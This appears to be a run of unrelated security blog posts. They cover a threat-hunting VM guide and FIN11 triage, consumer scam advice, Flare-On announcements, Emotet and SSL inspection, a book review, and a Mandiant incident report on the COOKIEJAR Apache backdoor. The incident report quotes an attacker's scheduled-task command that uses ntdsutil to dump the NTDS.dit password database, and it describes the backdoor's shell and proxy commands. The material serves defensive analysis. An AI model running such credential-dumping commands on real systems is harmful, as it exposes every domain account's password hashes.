Figure 2: Set-ExecutionPolicy Unrestricted -f script

Finally, execute the installer script as follows: .\install.ps1

After executing install.ps1, you’ll be prompted for the administrator password in order to automate host restarts during installation as several reboots occur. Optionally, you may pass your password as a command-line argument via ".\install.ps1 -password <password>". If you do not have a password set, hitting enter when prompted will also work.

This will be the last thing you will need to do before the installation is unattended. The script will set up the Boxstarter environment and proceed to download and install the ThreatPursuit VM environment, as seen in Figure 3.

Figure 3: Installation script execution

The installation process may take upwards of several hours depending on your internet connection speed and the web servers hosting the various files. Figure 4 shows the post-installation desktop environment, featuring the logo and a desktop shortcut. You will know when the install is finished with the VM's logo placed on the background. 

Figure 4: ThreatPursuit VM desktop installed

Custom Install

Is the standard installation too much for you? We provide a custom installation method that allows you to choose which chocolatey packages get installed. For additional details, see the Custom Install steps at our GitHub repository.

Installing Additional Packages

Since ThreatPursuit VM uses the Chocolatey Windows package manager, it's easy to install additional packages not included by default. For example, entering the command cinst github as administrator installs GitHub Desktop on your system.

To update all currently installed packages to their most recent versions, run the command cup all as administrator.

Getting Started: A Use Case

As threat analysts, what we choose to pursue will depend on the priorities and requirements of our current role. Often, they vary with each threat or adversary encountered such as financial crime, espionage, issue-motivated groups or individuals. The role broadly encompasses the collection and analysis of threat data (e.g., malware, indicators of attack/compromise) with the goal of triaging the data and developing actionable intelligence. For example, one may want to produce detection signatures based on malware network communications to classify, share or disseminate indicators of compromise (IOCs) in standardized ways. We may also use these IOCs in order to develop and apply analytical products that establish clusters of analogous nodes such as MITRE ATT&CK tactics and techniques, or APT groups. On the other hand, our goal can be as simple as triaging a malware sample behavior, hunting for indicators, or proving or disproving a hypothesis. Let's look at how we might start.

Open Hunting

To start our use case, let’s say we are interested in reviewing latest threat actor activity reported for the quarter. We sign in to the Mandiant Advantage portal (Figure 5) using our public subscription to get a snapshot view of any highlighted activity (Figure 6).

Figure 5: Mandiant Advantage portal

Figure 6: Actor activity for Q3 2020

Based on Mandiant Advantage report, we notice a number of highly active APT and FIN actors. We choose to drill in to one of these actors by hovering our mouse and selecting the actor tag FIN11.

We receive a high-level snapshot summary view of the threat actor, their targeted industry verticals, associated reports and much more, as seen in Figure 7. We also may choose to select the most recent report associated with FIN11 for review.

Figure 7: FIN11 actor summary

By selecting the “View Full Page” button as seen at the top right corner of Figure 6, we can use the feature to download indicators, as seen in the top right corner of Figure 8.

Figure 8: Full FIN11 page

Within the FIN11 report, we review the associated threat intelligence tags that contain finished intelligence products. However, we are interested in the collection of raw IOCs (Figure 9) that we could leverage to pivot off or enrich our own datasets.

Figure 9: Downloaded FIN11 indicators

Using the Malware Information Sharing Platform (MISP)as our collection point, we are going to upload and triage our indicators using our local MISP instance running on ThreatPursuit VM.

Please note you will need to ensure your local MISP instance is running correctly with the configuration of your choosing. We select the “Add Event” button, begin populating all needed fields to prepare our import, and then click “Submit”, as shown in Figure 10.

Figure 10: MISP triage of events

Under the tags section of our newly created FIN11 event, we apply relevant tags to begin associating aspects of contextual information related to our target, as seen in Figure 11.

Figure 11: MISP Event setup for FIN11

We then select “Add Attribute” into our event, which will allow us to import our MD5 hashes into the MISP galaxy, as seen in Figure 12. Using both the category and type, we select the appropriate values that best represent our dataset and prepare to submit that data into our event.

Figure 12: MISP import events into FIN11 event

MISP allows for a streamlined way to drill and tag indicators as well as enrich and pivot with threat intelligence. We can also choose to perform this enrichment process within MISP using a variety of open intelligence sources and their modules, such as Mandiant Advantage, PassiveTotal, Shodan and VirusTotal. We can also achieve the same result using similar tools already packaged in ThreatPursuit VM.

Using Maltego CE, installed as part of the VM, we can automate aspects of targeted collection and analysis of our FIN11 malware families and associated infrastructure. The following are just some of the Maltego plugins that can be configured post installation to help with the enrichment and collection process:

Targeting the suspected payload, we attempt to pivot using its MD5 hash value (113dd1e3caa47b5a6438069b15127707) to discover additional artifacts, such as infrastructure, domain record history, previously triaged reports, similar malware samples, timestamps, and the rich headers.

Importing our hash into Maltego CE, we can proceed to perform a range of queries to hunt and retrieve interesting information related to our FIN11 malware, as seen in Figure 13.

Figure 13: Maltego CE querying MD5 hash

Quite quickly we pull back indicators; in this case, generic named detection signatures from a range of anti-malware vendors. Using VirusTotalAPI Public, we perform a series of collection and triage queries across a variety of configured open sources, as shown in Figure 14.

Figure 14: Automating enrichment and analysis of targeted infrastructure

A visual link has been made public for quick reference.  

With our newly identified information obtained by passively scraping those IOCs from a variety of data providers, we can identify additional hashes, delivery URLs and web command and control locations, as shown in Figure 15.

Figure 15: Maltego visualization of FIN11 dropper

Pivoting on the suspected FIN11 delivery domain near-fast[.]com, we have found several more samples that were uploaded to an online malware sandbox website AppAnyRun. Within the ThreatPursuit VM Google Chrome browser and in the Tools directory, there are shortcuts and bookmarks to a range of sandboxes to help with accessing and searching them quickly. We can use AppAnyRun to further analyze the heterogenous networks and execution behaviors of these acquired samples.

We have identified another similar sample, which is an XLS document named “MONITIORING REPORT.xls” with the MD5 hash 5d7d2371668ad4a6484f76b0b6511961 (Figure 16). Let’s attempt to triage this newly discovered sample and qualify the relationship back to FIN11.

Figure 16: VirusTotal execution report of 5d7d2371668ad4a6484f76b0b6511961

Extracting interesting strings and indicators from this sample allows us to compare these artifacts against our own dynamic analysis. If we can’t access the original malware sample, but we have other indicators to hunt with, we could also pivot on various unique characteristics and attributes (e.g., imphash, vthash, pdb string, etc...) to discover related samples.

Even without access to the sample, we can also use YARA to mine for similar malware samples. One such source to mine is using the mquery tool and their datasets offered via CERT.PL. To fast track the creation of a YARA rule, we leverage the FIN11 YARA rule provided within the FIN11 Mandiant Advantage report. Simply copy and paste the YARA rule into mquery page and select “Query” to perform the search (Figure 17). It may take some time, so be sure to check back later (here are the results).

Figure 17: mquery YARA rule hunting search for FIN11 malware

Within our mquery search, we find a generic signature hit on Win32_Spoonbeard_1_beta for the MD5 hash 3c43d080b5badfdde7aff732c066d1b2. We associate this MD5 hash with another sandbox,, at the following URL:


As seen in Figure 18, this sample was first uploaded on May 2, 2019, with an associated infection chain intact.

Figure 18: AppAnyRun Execution Report on 3c43d080b5badfdde7aff732c066d1b2

We now have a confident signature hit, but with different named detections on the malware family. This is a common challenge for threat analysts and researchers. However we have gained interesting information about the malware itself such as its execution behavior, encryption methods, dropped files, timelines and command and control server and beacon information. This is more than enough for us to pivot across our own datasets to hunt for previously seen activities and prepare to finalize our report.

Once we are confident in our analysis, we can start to model and attribute the malware characteristics. We can leverage other threat exchange communities and intelligence sources to further enrich the information we collected on the sample. Enrichment allows the analysts to greater extrapolate context such as timings, malware similarity, associated infrastructures, and prior targeting information. We will briefly add our content into our MISP instance and apply tags to finalize our review.

We may wish to add MITRE ATT&CK tags (Figure 19) relevant across the malware infection chain for our sample as they could be useful from a modelling standpoint.

Figure 19: MITRE ATT&CK tags for the malware sample

Final Thoughts

We hope you enjoyed this basic malware triage workflow use-case using ThreatPursuit VM. There are so many more tools and capabilities within the included toolset such as Machine learning (ML) and ML algorithms, that also assist threat hunters by analyzing large volumes of data quickly. Check out some of FireEye’s ML blog posts here.

For a complete list of tools please see the ThreatPursuit VM GitHub repository. We look forward to releasing more blog posts, content and playbooks as our user base grows.

And finally, here are some related articles that might be of interest.

Malware Analysis

Digital Forensics

Intelligence Analysis and Assessments

Trick or Treat: Avoid These Spooky Threats This Halloween

Halloween scams

Trick or Treat: Avoid These Spooky Threats This Halloween

Spooky season is among us, and ghosts and goblins aren’t the only things hiding in the shadows. Online threats are also lurking in the darkness, preparing to haunt devices and cause some hocus pocus for unsuspecting users. This Halloween season, researchers have found virtual zombies and witches among us – a new trojan that rises from the dead no matter how many times it’s deleted and malicious code that casts an evil spell to steal users’ credit card data.

Let’s unlock the mystery of these threats so you can avoid cyber-scares and continue to live your online life free from worry.

Zombie Malware Hides in the Shadows

Just like zombies, malware can be a challenge to destroy. Oftentimes, it requires a user to completely wipe their device by backing up files, reinstalling the operating system, and starting from scratch. But what if this isn’t enough to stop the digital walking dead from wreaking havoc on your device?

Recently, a new type of Trojan has risen from the dead to haunt users no matter how many times it’s deleted. This zombie-like malware attaches itself to a user’s Windows 10 startup system, making it immune to system wipes since the malware can’t be found on the device’s hard drive. This stealthy malware hides on the device’s motherboard and creates a Trojan file that reinstalls the malware if the user tries to remove it. Once it sets itself up in the darkness, the malware scans for users’ private documents and sends them to an unknown host, leaving the user’s device in a ghoulish state.

Cybercriminals Leave Credit Card Users Spellbound

A malware misfortune isn’t the only thing that users should beware of this Halloween. Cybercriminals have also managed to inject malicious code into a wireless provider’s web platform, casting an evil spell to steal users’ credit card data. The witches and warlocks allegedly responsible for casting this evil spell are part of a Magecart spin-off group that’s known for its phishing prowess.  To pull off this attack, they plated a credit card skimmer onto the wireless provider’s checkout page. This allowed the hackers to exfiltrate users’ credit card data whenever they made a purchase – a spell that’s difficult to break.

Why These Cyberspooks Are Emerging

While these threats might seem like just another Halloween trick, there are other forces at play. According to McAfee’s Quarterly Threats Report from July 2020, threats like malware phishing and trojans have proven opportunistic for cybercriminals as users spend more and more time online – whether it be working from home, distance learning, or connecting with friends and loved ones. In fact, McAfee Labs observed 375 threats per minute in Q1 2020 alone.

So, as hackers continue to adapt their techniques to take advantage of users spending more time online, it’s important that people educate themselves on emerging threats so they can take necessary precautions and live their digital lives free from worry.

How to Stay Protected

Fortunately, there are a number of steps you can take to prevent these threats from haunting your digital life. Follow these tips to keep cybersecurity tricks at bay this spooky season:

Beware of emails from unknown senders

Zombie malware is easily spread by phishing, which is when scammers try to trick you out of your private information or money. If you receive an email from an unknown user, it’s best to proceed with caution. Don’t click on any links or open any attachments in the email and delete the message altogether.

Review your accounts

Look over your credit card accounts and bank statements often to check whether someone is fraudulently using your financial data – you can even sign up for transaction alerts that your bank or credit card company may provide. If you see any charges that you did not make, report it to the authorities immediately.

Use a comprehensive security solution

Add an extra layer of protection with a security solution like McAfee® Total Protection to help safeguard your digital life from malware and other threats. McAfee Total Protection also includes McAfee® WebAdvisor – web protection that enables users to sidestep attacks before they happen with clear warnings of risky websites, links, and files.

Stay updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Trick or Treat: Avoid These Spooky Threats This Halloween appeared first on McAfee Blogs.

Flare-On 7 Challenge Solutions

We are thrilled to announce the conclusion of the seventh annual Flare-On challenge. This year proved to be the most difficult challenge we’ve produced, with the lowest rate of finishers. This year’s winners are truly the elite of the elite! Lucky for them, all 260 winners will receive this cyberpunk metal key.

We would like to thank the challenge authors individually for their great puzzles and solutions:

  1. fidler – Nick Harbour (@nickharbour)
  2. garbage – Jon Erickson
  3. Wednesday – Blaine Stancill (@MalwareMechanic)
  4. report – Moritz Raabe (@m_r_tz)
  5. TKApp – Moritz Raabe (@m_r_tz)
  6. CodeIt – Mike Hunhoff (@mehunhoff)
  7. re_crowd – Chris Gardner, Moritz Raabe, Blaine Stancill
  8. Aardvark – Jacob Thompson
  9. crackinstaller – Paul Tarter (@Hefrpidge)
  10. break – Chris Gardner
  11. Rabbit Hole – Sandor Nemes (@sandornemes)

This year’s Flare-On challenge was the first to feature a live public scoreboard, so players could track their progress and the progress of previous Flare-On challenge champions. Despite this increased data at your fingertips, we are still going to bring you even more stats. As of 11:00am ET, participation was near record setting levels at 5,648 players registered. 3,574 of those players finished at least one challenge.

The U.S. reclaimed the top spot for total finishers with 22. Singapore was once again in second place, but in uncontested first place per capita, with one Flare-On finisher for every 296,000 living persons in Singapore. This is the first year we have included a per capita finishers by country chart, and we did it to highlight just what a remarkable concentration of talent exists in some corners of the world. Consistent top finisher Russia took third place, and a growing player base in Germany and Israel came into full bloom this year, with those countries edging out other frequent top five countries such as China, India and Vietnam.

All the binaries from this year’s challenge are now posted on the Flare-On website. Here are the solutions written by each challenge author:

  1. SOLUTION #1
  2. SOLUTION #2
  3. SOLUTION #3
  4. SOLUTION #4
  5. SOLUTION #5
  6. SOLUTION #6
  7. SOLUTION #7
  8. SOLUTION #8
  9. SOLUTION #9
  10. SOLUTION #10
  11. SOLUTION #11

Evolving Security Products for the new Realities of Living Life From Home

Strong Passwords

Announcing McAfee’s Enhanced Consumer Security for New Consumer Realities

With millions of people continuing to work and study remotely, scammers have followed them home—generating an average of 375 new threats per minute so far this year. In response, our enhanced consumer portfolio directly addresses the new needs and new threats people face.

McAfee Labs found that these new threats via malicious apps, phishing campaigns malware, and more, according to its McAfee COVID-19 Threat Report: July 2020, which amounted to an estimated $130 million in total losses in the U.S. alone.

To help people stay safer and combat these threats, today we announced our latest consumer security portfolio. Our enriched products come with better user experiences such as a native Virtual Private Network (VPN), along with new features, including integrated Social Media and Tech Scam Protection—all of which are pressing security essentials today.

Specifically, our product lineup has been updated to include:

Boosts to security and privacy

Scams involving tech support and product activation have continued to sneak into people’s inboxes and search results, which require a critical eye to spot. Here are some tips on how to identify these scams. We’re making it easier for people to stay safer with new features such as:

  • Tech Scam Protection: McAfee® WebAdvisor now provides a warning when visiting websites that can be used by cybercriminals to gain remote access to your PC, helping combat the  $55 million total fraud loss in the U.S. due to tech scams.
  • Advanced Malware Detection: McAfee enhanced its machine learning capabilities to improve overall time to detect emerging threats across devices as well as added protection against file-less threats.

Improvements make it easier for you to stay safer

With jobs and things that simply need to get done “right now,” security can be an afterthought. Sometimes that desire for convenience has consequences, leading to situations where people’s devices, data, and personal information get compromised. In response, we’re doing our part to make security more intuitive so that people can get things done quickly and safely:

  • A Better User Experience: An improved PC and app experience with easier navigation and readable alerts, and clear calls to action for faster understanding of potential issues.
  • Native VPN: Easier access to VPN and anti-malware device protection via one central place and log-in.
  • Updated Password Protection: Access iOS applications even faster with automatically filled in user account information and passwords in both apps and browsers on iOS devices.

Further security enhancements for today’s needs and tomorrow’s threats

With people’s newfound reliance on the internet, we’ve made new advances that help them live their increasingly connected lives—looking after security and privacy even more comprehensively than before on security and the apps they use:

  • Optimized Product Alerts: Redesigned product alerts, so consumers are better informed about possible security risks, with a single-click call to action for immediate protection.
  • Social Media Protection: To help prevent users from accidentally visiting malicious websites, McAfee now annotates social media feeds across six major platforms – Facebook, Twitter, YouTube, Instagram, Reddit, and LinkedIn.
  • Enhanced App Privacy Check: Consumers can now easily see when mobile apps request personal information, with app privacy now integrated into the main scan of Android devices.

McAfee is on a journey to ensure security allows users to be as carefree as possible online, now that more time is spent on devices as consumers navigate a new normal of life from home. For more information on our consumer product lineup, visit

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.


The post Evolving Security Products for the new Realities of Living Life From Home appeared first on McAfee Blogs.

Beating the Emotet Malware with SSL Interception

Guest post by Adrian Taylor, Regional VP of Sales for A10 Networks  

The Emotet trojan recently turned from a major cybersecurity threat to a laughingstock when its payloads were replaced by harmless animated GIFs. Taking advantage of a weakness in the way Emotet malware components were stored, white-hat hackers donned their vigilante masks and sabotaged the operations of the recently revived cyberthreat. While highly effective as well as somewhat humorous, the incident should not distract attention from two unavoidable truths. 
First, while the prank deactivated about a quarter of all Emotet malware payload downloads, the botnet remains a very real, ongoing threat and a prime vector for attacks such as ransomware. And second, relying on one-off operations by whimsical vigilantes is hardly a sustainable security strategy. To keep the remaining active Emotet botnets—and countless other cyber threats—out of their environment, organisations need to rely on more robust and reliable measures based on SSL interception (SSL inspection) and SSL decryption.

History of Emotet and the threat it presents
First identified in 2014, version one of Emotet was designed to steal bank account details by intercepting internet traffic. A short time after, a new version of the software was detected. This version, dubbed Emotet version two, came packaged with several modules, including a money transfer system, malspam module, and a banking module that targeted German and Austrian banks. Last year, we saw reports of a botnet-driven spam campaign targeting German, Polish, Italian, and English victims with craftily worded subject lines like “Payment Remittance Advice” and “Overdue Invoice.” Opening the infected Microsoft Word document initiates a macro, which in turn downloads Emotet from compromised WordPress sites.

After a relative quiet start to 2020, the Emotet trojan resurfaced suddenly with a surge of activity in mid-July. This time around, the botnet’s reign of terror took an unexpected turn when the payloads its operators had stored on – poorly secured WordPress sites – were replaced with a series of popular GIFs. Instead of being alerted of a successful cyberattack, the respective targets received nothing more alarming than an image of Blink 182, James Franco, or Hackerman.

Whilst this is all in good fun, the question remains: what if the white hats had left their masks in the drawer instead of taking on the Emotet trojan? And what about the countless other malware attacks that continue unimpeded, delivering their payloads as intended?

A view into the encryption blind spot with SSL interception (SSL inspection)
Malware attacks such as Emotet often take advantage of a fundamental flaw in internet security. To protect data, most companies routinely rely on SSL encryption or TLS encryption. This practice is highly effective for preventing spoofing, man-in-the-middle attacks, and other common exploits from compromising data security and privacy. Unfortunately, it also creates an ideal hiding place for hackers. To security devices inspecting inbound communications for threats, encrypted traffic appears as gibberish—including malware. In fact, more than half of the malware attacks seen today are using some form of encryption. As a result, the SSL encryption blind spot ends up being a major hole in the organisation’s defence strategy.

The most obvious way to address this problem would be to decrypt traffic as it arrives to enable SSL inspection before passing it along to its destination within the organisation—an approach known as SSL interception. But here too, problems arise. For one thing, some types of data are not allowed to be decrypted, such as the records of medical patients governed by privacy standards like HIPAA, making across-the-board SSL decryption unsuitable. And for any kind of traffic, SSL decryption can greatly degrade the performance of security devices while increasing network latency, bottlenecks, cost, and complexity. Multiply these impacts by the number of components in the typical enterprise security stack—DLP, antivirus, firewall, IPS, and IDS—and the problem becomes clear.

How efficient SSL inspection saves the day
With many organisations relying on distributed per-hop SSL decryption. A single SSL inspection solution can provide the best course of action by decrypting traffic across all TCP ports and advanced protocols like SSH, STARTTLS, XMPP, SMTP and POP3. Also, this solution helps provide network traffic visibility to all security devices, including inline, out-of-band and ICAP-enabled devices.

Whilst we should celebrate the work of the white hats who restrained Emotet, it is not every day that a lethal cyber threat becomes a matter of humour. But having had a good laugh at their expense, we should turn our attention to making sure that attacks like Emotet have no way to succeed in the future—without the need to count on vigilante justice - this is where SSL inspection can really save the day.

Book Review: Crime Dot Com, From Viruses to Vote Rigging, How Hacking Went Global

I had the great delight of reading Geoff White’s new book, “Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global”, I thoroughly recommend it. The book is superbly researched and written, the author’s storytelling investigative journalist style not only lifts the lid on the murky underground world of cybercrime but shines a light on the ingenuity, persistence and ever-increasing global scale of sophisticated cybercriminal enterprises.
Crime Dot Com: From Viruses to Vote Rigging, How Hacking Went Global
In Crime Dot Com Geoff takes the reader on a global historic tour of the shadowy cybercriminal underworld, from the humble beginnings with a rare interview with the elusive creator of the ‘Love Bug’ email worm, which caused havoc and panic back in 2000, right up to the modern-day alarming phenomenal of elections hacking by nation-state actors.

The book tells the tales of the most notorious hacks in recent history, explaining how they were successfully planned and orchestrated, all wonderfully written in a plain English style that my Luddite mother-in-law can understand.  Revealing why cybercrime is not just about the Hollywood stereotypical lone hacker, eagerly tapping away on a keyboard in the dark finding ingenious ways of exploiting IT systems. But is really about society obscured online communities of likeminded individuals with questionable moral compasses, collaborating, and ultimately exploiting innocent victims people out of billions of pounds.

The book covers the UK’s most notorious cyberattacks, such as the devasting 2017 WannaCry ransomware worm attack on the NHS, and the infamous TalkTalk hack carried out by teenage hackers.  Delving beyond the media 'cyber scare' headlines of the time, to bring the full story of what happened to the reader. The book also explores the rise and evolution of the Anonymous hacktivist culture and takes a deep dive into the less savoury aspects of criminal activities occurring on the dark web.

As you read about the history of cybercrime in this book, a kind of symbiosis between cybercriminals and nation-state hackers activities becomes apparent, from Russian law enforcement turning a blind-eye to Russia cybercriminals exploiting the West, to both the NSA’s and North Korea’s alleged involvement in creating the heinous WannaCry ransomware worm, and the UK cybercriminal that disabled that attack.  The growing number of physical world impacts caused by cyber-attacks are also probed in Crime Dot Com, so-called ‘kinetic warfare’. How sophisticated malware called Stuxnet, attributed by the media as United States military created, was unleashed with devastating effect to physically cripple an Iranian nuclear power station in a targeted attack, and why the latest cyber threat actors are targeting Britain’s energy network.

While this book is an easily digestible read for non-cyber security experts, the book provides cybersecurity professionals working on the frontline in defending organisations and citizens against cyber-attacks, with valuable insights and lessons to be learnt about their cyber adversaries and their techniques, particularly in understanding the motivations behind today's common cyberattacks.
5 out of 5: A must-read for anyone with an interest in cybercrime

COOKIEJAR: Tracking Adversaries With FireEye Endpoint Security’s Logon Tracker Module

During a recent investigation at a telecommunications company led by Mandiant Managed Defense, our team was tasked with rapidly identifying systems that had been accessed by a threat actor using legitimate, but compromised domain credentials. This sometimes-challenging task was made simple because the customer had enabled the Logon Tracker module within their FireEye Endpoint Security product.

Logon Tracker is an Endpoint Security Innovation Architecture module designed to simplify the investigation of lateral movement within Windows enterprise environments. Logon Tracker improves the efficiency of investigating lateral movement by aggregating historical logon activity and provides a mechanism to monitor for new activity. This data is presented in a user interface designed for analyzing investigative leads (e.g., a compromised account) and hunting for suspicious activity (e.g., RDP activity by privileged accounts). Logon Tracker also provides a graph interface that enables the identification of irregular and unique logons with the option to filter on hostnames, usernames, protocol, time of day, process name, privilege level, status (success/failure), and more.

Figure 1: Logon Tracker GUI interface

A critical component of a successful incident response is the scoping effort to identify systems that may have been accessed by the adversary. Windows Event Logs offer a commonly utilized method of identifying an adversary’s lateral movement between Windows systems. However, as with all log sources, Windows Event Logs are subject to data retention limits on endpoints, making the aggregated logon activity provided by Logon Tracker a critical source of evidence for incident response.

Logon Tracker’s graphical display along with the raw logon events allowed Mandiant Managed Defense to quickly identify 10 potentially compromised hosts and begin to create a timeline of adversary activity.

Managed Defense also leveraged Logon Tracker to monitor for additional suspicious logons and adversary activity throughout the incident response. Searching for logons (both failed and successful) from known compromised accounts and activity originating from compromised systems allowed our investigators to quickly determine which systems should be prioritized for analysis. Additionally, Logon Tracker provides investigators the ability to:

  • Filter logon data for activity originating from user-provided IP ranges
  • Search for logon data for activity by specific privileged accounts, including “Domain Administrators” and “Enterprise Administrators”
  • Search for any privileged logon using the “Privileged” logon type
  • Provide alerting and definition of custom rules (coming soon!)

Case Background

In mid-July, the Managed Defense Security Operations Center identified potential credential harvesting activity on a Windows server. The activity included the creation of a scheduled task configured to execute the built-in Windows utility, NTDSUTIL to take a snapshot of the active NTDS.dit file and save it locally to a text file as shown in Figure 2:

"schtasks  /s <redacted> /create /tn ntbackup /tr \"ntdsutil snapshot \\\"activate instance ntds\\\" create quit quit >c:\\Users\\admin\\AppData\\Local\\Temp\\ntds.log\" /sc once /st 05:38:00 /sd 07-12-2020 /f

Figure 2: Scheduled task creation for NTDS.DIT harvesting

The NTDS.dit file is a database that contains Active Directory data such as user objects, group memberships, groups, and—more useful to an adversary—password hashes for all users in the domain.

Leveraging Logon Tracker and simple timeline analysis, Managed Defense quickly determined an adversary had accessed this system to create a scheduled task from a system with a hostname that did not match the naming convention used within the environment. An anonymized example of Logon Tracker data is shown in Figure 3:

Figure 3: Logon Tracker data

Armed with the suspicious hostname and potentially compromised username, Managed Defense then used Logon Tracker’s search functionality to determine the scope of systems potentially accessed by the adversary.

The resulting investigation revealed that an Internet-facing Customer Relationship Management (CRM) application hosted on a Linux Apache web server had been compromised. Multiple web shells had been placed within web-accessible folders, allowing an adversary to execute arbitrary commands on the server. The adversary leveraged one of these web shells to install a malicious Apache module and restart Apache for the module to take effect. Mandiant has classified this module as COOKIEJAR (see the Malware Appendix at the end of the post for more details). The COOKIEJAR module enabled the adversary to proxy through the compromised server to any arbitrary IP/port pair within the customer’s internal network, see Figure 4.

Figure 4: PCAP data

Using this proxied access to the customer’s network, the adversary leveraged previously compromised domain credentials to connect to multiple Windows servers using SMB. Due to the use of the proxy to connect into the customer’s network, the hostname of the adversary’s workstation being used to conduct the attack was also passed into the logon events. This type of activity occurs due to the direct connection to the customers network and is similar to being on the same LAN. The non-standard hostname and non-standard customer naming convention used by the adversary help make scoping an easy task. Additionally, Managed Defense was able to leverage network detection to alert on the authentication attempts and activities of the adversary’s host.

Malware Appendix

During the course of the response, Mandiant identified a customized malicious Apache plugin capable of intercepting HTTP requests to an Apache HTTP server. The new malware family COOKIEJAR was created to aid in clustering and tracking this activity. The COOKIEJAR module installs a pre-connection hook that only runs if the client IP address matches a specified hardcoded adversary-controlled IP address. It listens for SSL/TLS connections on the port specified by the Apache server, using a certificate and private key loaded from /tmp/cacert.pem and /tmp/privkey.pem respectively. If the client IP address matches the hardcoded IP address (Figure 4), the backdoor accepts three commands based on the start of the URL:

  • /phpconf_t/: Simply writes <html><h1>accepted.</h1></html> as the response. Likely used to test if the server is infected with the malware.
  • /phpconf_s/: Executes commands on the server. Any communications to and from the system are forwarded to a shell, and are AES-256-ECB encrypted and then Base58 encoded.
  • /phpconf_p/: Decode the second encoded string provided as a hostname/port (the first is ignored), using Base58 and AES-256-ECB (same key as before). The server will connect to the remote host and act as a proxy for the command and control (C2). Data to and from the C2 is encoded using Base58 and AES-256-ECB. Data to and from the remote host is not encoded.

Figure 5: Hardcoded configuration data within COOKIEJAR

Detecting the Techniques



Network Security/MVX

  • APT.Backdoor.Linux64_COOKIEJAR_1
  • APT.Backdoor.Linux_COOKIEJAR_1
  • APT.Backdoor.Linux.COOKIEJAR


  • Chris Gardner, Malware Analyst
  • Fred House, Director, Engineering

More information on FireEye Endpoint Security's  Logon Tracker Module  including the module download and user manual are available in the  FireEye Marketplace . Learn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed Defense attacks this year.

Announcing the Seventh Annual Flare-On Challenge

The Front Line Applied Research & Expertise (FLARE) team is honored to announce that the popular Flare-On challenge will return for a triumphant seventh year. Ongoing global events proved no match against our passion for creating challenging and fun puzzles to test and hone the skills of aspiring and experienced reverse engineers.

The contest will begin at 8:00 p.m. ET on Sept. 11, 2020. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 23, 2020.

This year’s contest features a total of 11 challenges in a variety of formats, including Windows, Linux, Python, VBA and .NET. This is one of the only Windows-centric CTF contests out there and we have crafted it to closely represent the challenges faced by our FLARE team on a daily basis.

If you are skilled and dedicated enough to complete the seventh Flare-On challenge, you will receive a prize and recognition on the Flare-On website for your accomplishment. Prize details will be revealed later, but as always, it will be worthwhile swag to earn the envy of your peers. In previous years we sent out belt buckles, replica police badges, challenge coins, medals and huge pins.

Check the Flare-On website for a live countdown timer, to view the previous year’s winners, and to download past challenges and solutions for practice. For official news and information, we will be using the Twitter hashtag: #flareon7.

Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data

Working from home

One of the joys of online shopping is instant gratification – your purchases arrive on your doorstep in just a few days! Unfortunately, consumers aren’t the only ones taking advantage of this convenience – hackers are also using it to trick users into handing over money or data. Recently, AARP recounted several scams where cybercriminals posed as Amazon’s customer service or security team as a ploy to steal your personal information.  

How These Scams Work

These scams all begin with an unsuspecting user seeking help from Amazon’s customer support or their security team, only to find the contact information of a fraudster posing as the companyFor example, in one of these scamsa user called a fraudulent customer support number to help his wife get back into her account. However, the scammer behind the phone number tried to sell the victim a fake $999 computer program to prevent hacking on his own device. Thankfully, according to AARP, the man refused to send the money.  

 Another victim reported receiving an email from the “Amazon Security Team,” stating that a fraudulent charge was made on her account and that it was locked as a result. The email asked for her address and credit or debit card information to unlock her account and get a refund on the fake charge. But upon closer review, the woman noticed that the email address ended in .ng, indicating that it was coming from Nigeria. Luckily, the woman refused to send her information and reported the incident instead.   

Not all victims are as lucky. One woman received an email that looked like it was from Amazon and gave the scammers her social security number, credit card number, and access to her devices. Another victim lost $13,300 to scammers who contacted her through a messaging platform stating that someone hacked her Amazon account and that she needed to buy gift cards to restore it.  

Steer Clear of These Tricks

Many of these fraudsters are taking advantage of Amazon’s credibility to trick unsuspecting out of money and personal data. However, there are ways that users can prevent falling prey to these scams – and that all starts with staying educated on the latest schemes so consumers know what to look out for. By staying knowledgeable on the latest threats, consumers can feel more confident browsing the internet and making online purchases. Protect your digital life by following these security tips:  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be wary of emails asking you to act

If you receive an email or text asking you to take a specific action or provide personal details, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from accidentally downloading malicious content. Additionally, note that Amazon does not ask for personal information like bank account numbers or Social Security numbers in unsolicited emails 

Only use one credit card for online purchases

By only using one payment method for online purchases, you can keep a better eye out for fraud instead of monitoring multiple accounts for suspicious activity. 

Look out for common signs of scams

Be on the lookout for fake websites and phone numbers with Amazon’s logo. Look for misspelled words and grammatical errors in emails or other correspondence. If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t click on it, as it’s probably a phishing link that could download malicious content onto your device. It’s best to avoid interacting with the link and delete the message altogether. 

Stay updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data appeared first on McAfee Blogs.

US judge: WhatsApp lawsuit against Israeli spyware firm NSO can proceed

NSO Group was sued last year by messaging app owned by Facebook

An Israeli company whose spyware has been used to target journalists in India, politicians in Spain, and human rights activists in Morocco may soon be forced to divulge information about its government clients and practices after a judge in California ruled that a lawsuit against the company could proceed.

NSO Group was sued by WhatsApp, which is owned by Facebook, last year, after the popular messaging app accused the company of sending malware to 1,400 of its users over a two-week period and targeting their mobile phones.

Continue reading...

Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure


